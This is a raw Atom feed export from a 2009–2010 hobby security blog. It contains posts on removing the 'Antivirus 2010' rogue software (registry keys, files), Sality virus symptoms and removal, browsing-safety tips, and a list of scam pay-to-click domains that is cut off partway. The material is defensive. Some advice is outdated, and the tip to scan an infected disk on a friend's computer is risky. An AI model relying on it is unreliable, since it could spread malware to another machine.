Help:&amp;nbsp;&lt;a href="http://www.2-spyware.com/news/post203.html"&gt;How to kill the process&lt;/a&gt;&lt;br /&gt;2. Remove the following Registry values&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;HKEY_CURRENT_USER\Software\AV2010&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_CLASSES_ROOT\AppID\{3C40236D-990B-443C-90E8-B1C07BCD4A68}&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_CLASSES_ROOT\AppID\IEDefender.DLL&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_CLASSES_ROOT\CLSID\{FC8A493F-D236-4653-9A03-2BF4FD94F643}&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO.1&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_CLASSES_ROOT\Interface\{7BC7565C-5062-43CE-8797-DC2C271140A9}&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_CLASSES_ROOT\TypeLib\{705FD64B-2B7B-4856-9337-44CA1DA86849}&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser &amp;nbsp;Helper Objects\{FC8A493F-D236-4653-9A03-2BF4FD94F643}&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1- &amp;nbsp; 08002bE10318}\0012&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE- &amp;nbsp;BFC1-08002bE10318}\0013&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Gamma Display"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; Help:&amp;nbsp;&lt;a href="http://www.2-spyware.com/articles/security/46.html"&gt;How to remove registry values&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3. Unregister DLLs&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; IEDefender.dll&lt;br /&gt;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;Help: &lt;a href="http://www.2-spyware.com/articles/security/54.html"&gt;How to unregister malicious dlls&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;4. Delete files&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;Program Files\\AV2010\\AV2010.exe Program Files\\AV2010\\svchost.exe WINDOWS\\system32\\IEDefender.dll WINDOWS\\system32\\wingamma.exe&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;Help: &lt;a href="http://www.2-spyware.com/articles/tutorials/91.html"&gt;How to delete malicious files&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5 &amp;nbsp;Delete Directories&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;c:\Program Files\AV2010&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; c:\Documents and Settings\All Users\Start Menu\Programs\AV2010&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border: 0;" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=186282%26bid=479675" type="text/javascript"&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;noscript&gt;&lt;a href="http://www.bidvertiser.com/"&gt;pay per click&lt;/a&gt;&lt;/noscript&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7477645293515395927?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7477645293515395927/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/03/antivirus-2010-removal.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7477645293515395927'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7477645293515395927'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/03/antivirus-2010-removal.html' title='Antivirus 2010: Removal'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mPzqYV2-K04/S62ZWJCZBCI/AAAAAAAAAKQ/QExVgyIT5-M/s72-c/av2010.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7453078467259321987</id><published>2010-03-25T02:37:00.000-07:00</published><updated>2010-03-25T02:42:55.628-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='symptoms'/><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><category scheme='http://www.blogger.com/atom/ns#' term='sality'/><title type='text'>Sality Virus: Symptoms and Removal...</title><content type='html'>It was two weeks ago a friend of mine gave me his pen drive to copy some of the softwares from my computer to his computer. Since I was in a hurry and trusted my antivirus for my computer's safety, I didn't check for the viruses in the pen drive. After a few minutes I noticed that the icons of anti virus and firewall disappeared. So I tried to run the applications from the start menu, but in vain. Then I tried to run the anti malware program. It also doesn't open. Then I tried to reinstall my anti virus. But it didn't worked. At last I had to format my computer. Then I collected the details about the virus to prevent the future attack. The situation that allowed the virus to enter into my computer were:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;My carelessness to disable&amp;nbsp;auto run&amp;nbsp;before inserting pen drive.&lt;/li&gt;&lt;li&gt;Even though the antivirus was powerful to detect and remove Sality virus, it lacks real time protection that enable the virus to over power anti virus.&lt;/li&gt;&lt;/ol&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_mPzqYV2-K04/S6suZdxSvUI/AAAAAAAAAJU/CYRVi7SfeHE/s1600/Sal+copy.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_mPzqYV2-K04/S6suZdxSvUI/AAAAAAAAAJU/CYRVi7SfeHE/s320/Sal+copy.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;Sality is a family of file infecting viruses.It spreads by infecting exe and scr files. The virus also includes an autorun worm component that allows it to spread to any removable drive when connected to a computer. In addition, Sality includes a downloader trojan component that installs additional malware from the internet.&amp;nbsp;Sality &amp;nbsp;virus have keylogging and back door capabilities. It may infect executable files by prepending its code to host files.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Symptoms of infection:&lt;/b&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;Sality disables antivirus software and prevents access to certain antivirus and security websites. Sality can also prevent booting into Safe Mode and may delete security-related files found on infected systems. To spread via the autorun component, Sality generally drops a .cmd, .pif, and .exe to the root of discoverable drives, along with an autorun.inf file which contains instructions to load the dropped files when the drive is accessed.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Removal:&lt;/b&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Try deleting with an anti virus software. If it fails, then remove the hard disk from your computer and connect it to your friends computer and boot into the operating system installed in his computer. Then run the updated anti virus in his system. Anti viruses like avast or BitDefender or Kaspersky or etc can be used. AVG is a bit lame. Repair or delete the viruses found on the scan. Care must be taken not to open any of the drives or files in your hard disk before running the anti virus in your friend's system since it may infect his computer. Then detach the hard disk from his computer and connect it to your computer. Then install a good and updated anti virus with real time protection in order to prevent future infection. Avast provides real time protection and I am satisfied in its functioning. So I am recommending it for your computer.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border: 0;" width="125" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7453078467259321987?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7453078467259321987/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/03/sality-virus-symptoms-and-removal.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7453078467259321987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7453078467259321987'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/03/sality-virus-symptoms-and-removal.html' title='Sality Virus: Symptoms and Removal...'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mPzqYV2-K04/S6suZdxSvUI/AAAAAAAAAJU/CYRVi7SfeHE/s72-c/Sal+copy.gif' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2743781224563915391</id><published>2009-08-14T03:15:00.002-07:00</published><updated>2009-08-14T05:19:24.711-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='internet security'/><category scheme='http://www.blogger.com/atom/ns#' term='computer security'/><title type='text'></title><content type='html'>&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt; &lt;/a&gt;&lt;br /&gt;Today we are familiar with the term cyber crimes. Sometime we may be a victim of the cyber crime. Most of the cyber crimes are done through the internet. The increasing number of cyber crime has made it difficult to use the internet even for browsing. Some countries have banned the sites related to pornography. Most of the servers creates the black list which contains the name of the websites that may harm the users if viewed. Now let us look into how to use internet safely.&lt;br /&gt;Install a software firewall in your system. The firewall allows you to know about the applications that access the internet and allows you to block the applications from accessing the internet. See the figure below.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SoU-xymgFGI/AAAAAAAAAHc/lklQ_6efdQY/s1600-h/firewall.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 238px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SoU-xymgFGI/AAAAAAAAAHc/lklQ_6efdQY/s320/firewall.JPG" alt="" id="BLOGGER_PHOTO_ID_5369767155826955362" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;There may be virus or trojan installed in your computer that access the internet without your knowledge. The firewall shows all the applications connected to the internet and allows you to block or terminate the application.&lt;br /&gt;&lt;br /&gt;As you know, the world's most safest browser is Mozilla Firefox 3.5. It is very fast also. Hence it is more recommended to use Firefox browser. The fire fox has a add-on named Website Of Trust (WOT) which shows how safe the website we visited is. So I recommend you to install this add-on. The screen shot is given below:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/SoVP7VbPeDI/AAAAAAAAAHk/HukHBGd_Ui0/s1600-h/wot.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 282px; height: 320px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/SoVP7VbPeDI/AAAAAAAAAHk/HukHBGd_Ui0/s320/wot.JPG" alt="" id="BLOGGER_PHOTO_ID_5369786011491465266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;If you are visiting a site related to finance, it would be better if you use private browsing option in fire fox. To enable private browsing go to tools menu -&gt; start private browsing. During private browsing, no data will be stored other than downloaded files and bookmarks.&lt;br /&gt;&lt;br /&gt;Try to avoid storing user name and passwords in browser. Also change the password periodically. This will ensure more security to your account. Also don't forget to sign out or log out after viewing the website. Do not click on the links that you are unsure about the content.&lt;br /&gt;&lt;br /&gt;Try to avoid visiting porn sites and sites that provides serials or cracks for the sharewares. Download files from the servers you trust. For searching software, it would be better if you search software in filehippo or CNET or other such trusted sites.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;       &lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" alt="" border="0" /&gt;&lt;/a&gt;        &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;           &lt;a onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()"&gt;&lt;img alt="Bookmark and Share" style="border: 0pt none ;" src="http://s7.addthis.com/static/btn/lg-share-en.gif" border="0" width="125" height="16" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt;&lt;br /&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2743781224563915391?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2743781224563915391/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/08/today-we-are-familiar-with-term-cyber.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2743781224563915391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2743781224563915391'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/08/today-we-are-familiar-with-term-cyber.html' title=''/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mPzqYV2-K04/SoU-xymgFGI/AAAAAAAAAHc/lklQ_6efdQY/s72-c/firewall.JPG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7415602806715778384</id><published>2009-08-13T04:05:00.000-07:00</published><updated>2009-08-13T04:34:42.425-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='scam'/><category scheme='http://www.blogger.com/atom/ns#' term='blacklisted websites'/><category scheme='http://www.blogger.com/atom/ns#' term='fraud'/><title type='text'>Black Listed Sites</title><content type='html'>Today the number of fraud websites are increasing. These websites steal out time and money. We must take prevention against these site. Also tell about these fraud sites to your friends also so that they will not be trapped. Most of these site offer money for clicking on the links or other such things. But there will be no payment. I had also fell in to these traps and as a result I am trying to prevent others from falling into the same trap. Also I am providing a list of Black Listed Websites. Please bookmark this and also tell to your friends not to fall in trap.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;A&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;aaa-mails.com&lt;br /&gt;abovebux.com&lt;br /&gt;abux1.cn&lt;br /&gt;active-Clickers.com&lt;br /&gt;ad2bank.info&lt;br /&gt;ad-fortune.com&lt;br /&gt;adandel.com&lt;br /&gt;adbux.org&lt;br /&gt;adbuxter.com&lt;br /&gt;adfez.net&lt;br /&gt;admonsta.com&lt;br /&gt;adoost.com&lt;br /&gt;adpalptc.com&lt;br /&gt;adptc.info&lt;br /&gt;ads-bux.net&lt;br /&gt;ads.own.cz&lt;br /&gt;ads4cash.net&lt;br /&gt;adsgain.com&lt;br /&gt;adsneed.com&lt;br /&gt;adstab.com&lt;br /&gt;adstobux.com&lt;br /&gt;adstomail.com&lt;br /&gt;advertbux.com&lt;br /&gt;advercash.net&lt;br /&gt;advertunited.com&lt;br /&gt;advintage.com&lt;br /&gt;aceptc.com&lt;br /&gt;ahacash.com&lt;br /&gt;alabamaclicks.com&lt;br /&gt;alabamaptc.info&lt;br /&gt;alertbux.com&lt;br /&gt;alertptc.com&lt;br /&gt;allcashmail.com&lt;br /&gt;allstarsbux.com&lt;br /&gt;allyousubmitters.com&lt;br /&gt;almiyachts.com&lt;br /&gt;alwaysbux&lt;br /&gt;alwayspay.com&lt;br /&gt;american-mails.com&lt;br /&gt;amigoemail.com&lt;br /&gt;ancient-bux.ch&lt;br /&gt;angelbux.com&lt;br /&gt;annies-biz.com&lt;br /&gt;apachemails.com&lt;br /&gt;anotherrealm.info&lt;br /&gt;applemails.com&lt;br /&gt;appolomails.com&lt;br /&gt;arabbux.com&lt;br /&gt;arcane-mails.com&lt;br /&gt;argusbux.info&lt;br /&gt;ariaptc.com&lt;br /&gt;armybux.com&lt;br /&gt;asonewishes.com&lt;br /&gt;at-mails.com&lt;br /&gt;atlantis.shiftcode.com&lt;br /&gt;auction-emails.com&lt;br /&gt;augbux.com&lt;br /&gt;auto-bux.com&lt;br /&gt;awsurveys.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;B&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;babyloncash.com&lt;br /&gt;bananaclicks.info&lt;br /&gt;bank-mails.com&lt;br /&gt;bastard-cash.com&lt;br /&gt;baybux.com&lt;br /&gt;beanybux.com&lt;br /&gt;bee-gold.com&lt;br /&gt;beehivemail&lt;br /&gt;bestearnbux.net&lt;br /&gt;bestpaidbux.cn&lt;br /&gt;beta-cash.com&lt;br /&gt;bettybucks.com&lt;br /&gt;bgclicks.com&lt;br /&gt;bigdollat-mails&lt;br /&gt;biggestdollars.com&lt;br /&gt;bigkingpay.com&lt;br /&gt;bigx2.bigxmailer.com&lt;br /&gt;bigx3.bigxmailer.com&lt;br /&gt;billobucks.com&lt;br /&gt;birdclicks.info&lt;br /&gt;bloomingcash.info&lt;br /&gt;boffopaidmail.com&lt;br /&gt;bondjamesbond.net&lt;br /&gt;boostbux.info&lt;br /&gt;bossbux&lt;br /&gt;braveviolation.com&lt;br /&gt;brptc.com&lt;br /&gt;bugcash.com&lt;br /&gt;b-u-x.net&lt;br /&gt;bux.bg&lt;br /&gt;bux.to&lt;br /&gt;bux-4-clicks.com&lt;br /&gt;bux-enterprises.com&lt;br /&gt;bux-paid.com&lt;br /&gt;bux-pay.info&lt;br /&gt;bux10.info&lt;br /&gt;bux11.com&lt;br /&gt;bux100.com&lt;br /&gt;bux24.com&lt;br /&gt;bux2cash.com&lt;br /&gt;bux2click.com&lt;br /&gt;bux2earn.com&lt;br /&gt;bux2you.com&lt;br /&gt;Bux3.com&lt;br /&gt;Bux3.net&lt;br /&gt;bux333.com&lt;br /&gt;bux4.net&lt;br /&gt;bux4all.com&lt;br /&gt;bux6.com&lt;br /&gt;bux69.com&lt;br /&gt;buxa.org&lt;br /&gt;buxalot.net&lt;br /&gt;buxbank.com&lt;br /&gt;buxbin.com&lt;br /&gt;buxbob.net&lt;br /&gt;buxboss.com&lt;br /&gt;buxcash.com&lt;br /&gt;buxcore.com&lt;br /&gt;buxdevil.com&lt;br /&gt;buxdol.info&lt;br /&gt;buxdol.net&lt;br /&gt;buxdotcom.com&lt;br /&gt;buxear.com&lt;br /&gt;buxearn.com&lt;br /&gt;buxeast.com&lt;br /&gt;buxed.info&lt;br /&gt;buxer.biz&lt;br /&gt;buxer.org&lt;br /&gt;buxero.com&lt;br /&gt;buxeuro.com&lt;br /&gt;buxgalore.com&lt;br /&gt;buxhall.net&lt;br /&gt;buxheaven.com&lt;br /&gt;buxhere.com&lt;br /&gt;buxilliard.com&lt;br /&gt;buxing.info&lt;br /&gt;buxinstant.com&lt;br /&gt;buxit.info&lt;br /&gt;buxlab.com&lt;br /&gt;buxlove.com&lt;br /&gt;buxlv.com&lt;br /&gt;bux.mr-rex.net&lt;br /&gt;bux.own.cz&lt;br /&gt;buxmania.cn&lt;br /&gt;buxmania.info&lt;br /&gt;buxme.info&lt;br /&gt;buxnolimit.com&lt;br /&gt;buxology.com&lt;br /&gt;buxon.net&lt;br /&gt;buxone.com&lt;br /&gt;buxor.?nfo&lt;br /&gt;buxout.com&lt;br /&gt;buxparadise.com&lt;br /&gt;buxplus.com&lt;br /&gt;buxplus.org&lt;br /&gt;buxptc.com&lt;br /&gt;buxs.ws&lt;br /&gt;buxsense.com&lt;br /&gt;buxsit.com&lt;br /&gt;buxtc.com&lt;br /&gt;buxup.com&lt;br /&gt;buxvisit.net&lt;br /&gt;buxvisitors.net&lt;br /&gt;buxwanted.com&lt;br /&gt;buxway.net&lt;br /&gt;buxybux.com&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;C&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;can-discount.com&lt;br /&gt;cannabisbux.net&lt;br /&gt;cannabismails.com&lt;br /&gt;carclicks.net&lt;br /&gt;cash-overflow.info&lt;br /&gt;cash2all.cn&lt;br /&gt;cash4ever.biz&lt;br /&gt;cash4hits.com&lt;br /&gt;cash4offers.com&lt;br /&gt;cashbux.com&lt;br /&gt;cash-kitty.com&lt;br /&gt;cashclicks.biz&lt;br /&gt;cashclix.net&lt;br /&gt;cashinonads.info&lt;br /&gt;cashmybux.com&lt;br /&gt;cashnbux.com&lt;br /&gt;cashnclicks.com&lt;br /&gt;cashout.me&lt;br /&gt;cashoutclix.com&lt;br /&gt;cashpointclicks.com&lt;br /&gt;cashposse.net&lt;br /&gt;cashread.com&lt;br /&gt;cashsea.com&lt;br /&gt;casinoptc.com&lt;br /&gt;cassandraclicks.com&lt;br /&gt;catch-cash.com&lt;br /&gt;celbux.com&lt;br /&gt;cent-clicks.com&lt;br /&gt;centclicks.com&lt;br /&gt;champbux.com&lt;br /&gt;cherokeeptr.com&lt;br /&gt;cherryclicks.info&lt;br /&gt;chillbux.com&lt;br /&gt;chobitmails.com&lt;br /&gt;class-act-clicks.com&lt;br /&gt;clean-invest.com&lt;br /&gt;click2bepaid.com&lt;br /&gt;click2bux.com&lt;br /&gt;clickandbux.com&lt;br /&gt;click-bux.net&lt;br /&gt;clickbux.com&lt;br /&gt;clickbux.org&lt;br /&gt;clickbuxx.com&lt;br /&gt;clickearnmoney.com&lt;br /&gt;clickerbux.com&lt;br /&gt;clickerscompany.com&lt;br /&gt;clickfantasy.net&lt;br /&gt;clickin.me&lt;br /&gt;clickingmoney4u.com&lt;br /&gt;clickkt.com&lt;br /&gt;clickmonster.info&lt;br /&gt;clickmybux.com&lt;br /&gt;clickonbux.info&lt;br /&gt;clickosaur.us&lt;br /&gt;clickpay.ca&lt;br /&gt;clicks4bux.com&lt;br /&gt;clicks4cash.com&lt;br /&gt;clicktopsites.com&lt;br /&gt;clickvoid.com&lt;br /&gt;clix4coins.com&lt;br /&gt;click4u.net&lt;br /&gt;clixango.com&lt;br /&gt;clixearn.com&lt;br /&gt;clickfantasy.net&lt;br /&gt;clickptc.us&lt;br /&gt;clixmania.net&lt;br /&gt;clixmedia.biz&lt;br /&gt;clixmx.com&lt;br /&gt;clixplaza.com&lt;br /&gt;cloudybux.com&lt;br /&gt;cm-ptr.com&lt;br /&gt;coinclicks.net&lt;br /&gt;coinzbux.com&lt;br /&gt;coolybux.info&lt;br /&gt;cometbux.com&lt;br /&gt;comfortableIncome.net&lt;br /&gt;cooperativemail.com&lt;br /&gt;copperflame.com&lt;br /&gt;copymails.com&lt;br /&gt;cosmicwealth.com&lt;br /&gt;coverclicks.com&lt;br /&gt;cowboy-mail.com&lt;br /&gt;crabclicks.info&lt;br /&gt;crazyclicks.com&lt;br /&gt;crazyptc.biz&lt;br /&gt;cream-mails.com&lt;br /&gt;crewbux.com&lt;br /&gt;crewbuxonline.com&lt;br /&gt;croclix.com&lt;br /&gt;croptc.com&lt;br /&gt;cruiseshipclicks.info&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;D&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br 